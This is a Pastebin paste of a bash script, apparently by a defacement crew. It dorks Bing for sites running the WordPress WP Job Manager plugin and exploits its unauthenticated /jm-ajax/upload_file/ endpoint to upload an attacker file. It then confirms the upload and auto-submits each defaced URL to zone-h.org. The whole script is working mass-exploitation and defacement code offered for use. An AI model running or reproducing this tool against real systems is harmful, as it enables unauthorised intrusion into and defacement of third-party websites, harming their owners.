Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # Thank's To BC0DE.NET - NAONLAH.NET - BTM - IDX- Extreme Crew
- # SilentC0ders - Lestravo - Zombie-root - Boniw - KONSLET
- # CODE BY CCOCOT - ccocot@bc0de.net
- CY='\e[36m'
- GR='\e[34m'
- OG='\e[92m'
- WH='\e[37m'
- RD='\e[31m'
- YL='\e[33m'
- BF='\e[34m'
- DF='\e[39m'
- OR='\e[33m'
- PP='\e[35m'
- B='\e[1m'
- CC='\e[0m'
- nick="bc0de" ## NICK FOR SUBMIT Zone-H
- filee="bc0de.gif" ## FILE NAME
- ngeget_site(){
- local tgl=$(date +"%Y")
- local bln=$(date +"%m")
- local kimcil=`curl "http://www.bing.com/search?q=${2}&first=${1}1" -s`
- local grab=$(echo $kimcil | grep -Po "(?<=<h2><a href=\")[^\"]*")
- printf "===== PAGE ${1} =====\n\n"
- for sites in $grab; do
- IFS="/" read -r -a site <<< "$sites"
- printf "${OG}${B}=>${CC} ${site[2]} - [${CY}${B}${sites}${CC}]\n"
- local exploit=$(curl -s --connect-timeout 10 ${site[2]}/jm-ajax/upload_file/ -D -)
- if [[ $exploit =~ "HTTP/1.1 200 OK" ]]; then
- printf "${site[2]}/jm-ajax/upload_file/ ${OG}${B}200 OK${CC}\n"
- if [[ $exploit =~ "{\"files\":" ]]; then
- printf "${site[2]}/jm-ajax/upload_file/ ${OG}${B}VULN${CC}\n"
- local exploit_k=$(curl -s -k -F "file=@${4}" "${site[2]}/jm-ajax/upload_file/")
- printf "Exploit ...\n"
- local exploit_status=$(curl -s ${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} --head)
- if [[ $exploit_status =~ "200" ]]; then
- printf "${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} => ${OG}${B}FOUND${CC}\n"
- local zoneh=$(curl -s "http://www.zone-h.org/notify/single" -d "defacer=${3}&domain1=http://${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4}&hackmode=30&reason=1" | grep -c "<font color=\"red\">ERROR")
- if [[ $zoneh == 0 ]]; then
- printf "${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} => Zoneh [${3}] : ${B}${OG}OK${CC}\n\n"
- echo "${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} => Zoneh OK" >> output.txt
- else
- printf "${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} => Zoneh [${3}] : ${B}${RD}ERROR${CC}\n\n"
- echo "${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} => Error" >> output.txt
- fi
- else
- printf "${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} => ${RD}${B}NOT FOUND${CC}\n\n"
- fi
- else
- printf "${site[2]}/jm-ajax/upload_file/ ${RD}${B}NOT VULN${CC}\n\n"
- fi
- else
- printf "${site[2]}/jm-ajax/upload_file/ ${RD}${B}Error${CC}\n\n"
- fi
- done
- }
- cat << "EOF"
- ____ ____ ___ ____ _____ _ _ _____ _____
- | __ ) / ___/ _ \| _ \| ____| | \ | | ____|_ _|
- | _ \| | | | | | | | | _| | \| | _| | |
- | |_) | |__| |_| | |_| | |___ _| |\ | |___ | |
- |____/ \____\___/|____/|_____(_)_| \_|_____| |_|
- BC0DE.NET - ccocot@Bc0de.net
- [BOT] BING DORKER With Exploit WP JOB MANAGER Auto Submit Zone-H
- BC0DE - NAONLAH
- EOF
- printf "\n===== GET INFO =====\n"
- printf "Nick : $nick\n"
- printf "File : $filee"
- printf "\n====================\n\n"
- printf "${B}Insert Keyword : ${CC}\n=> "; read Keyword
- printf "\n"
- for (( i = 0; i < 40; i++ )); do
- ngeget_site $i $Keyword $nick $filee
- done
- wait
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement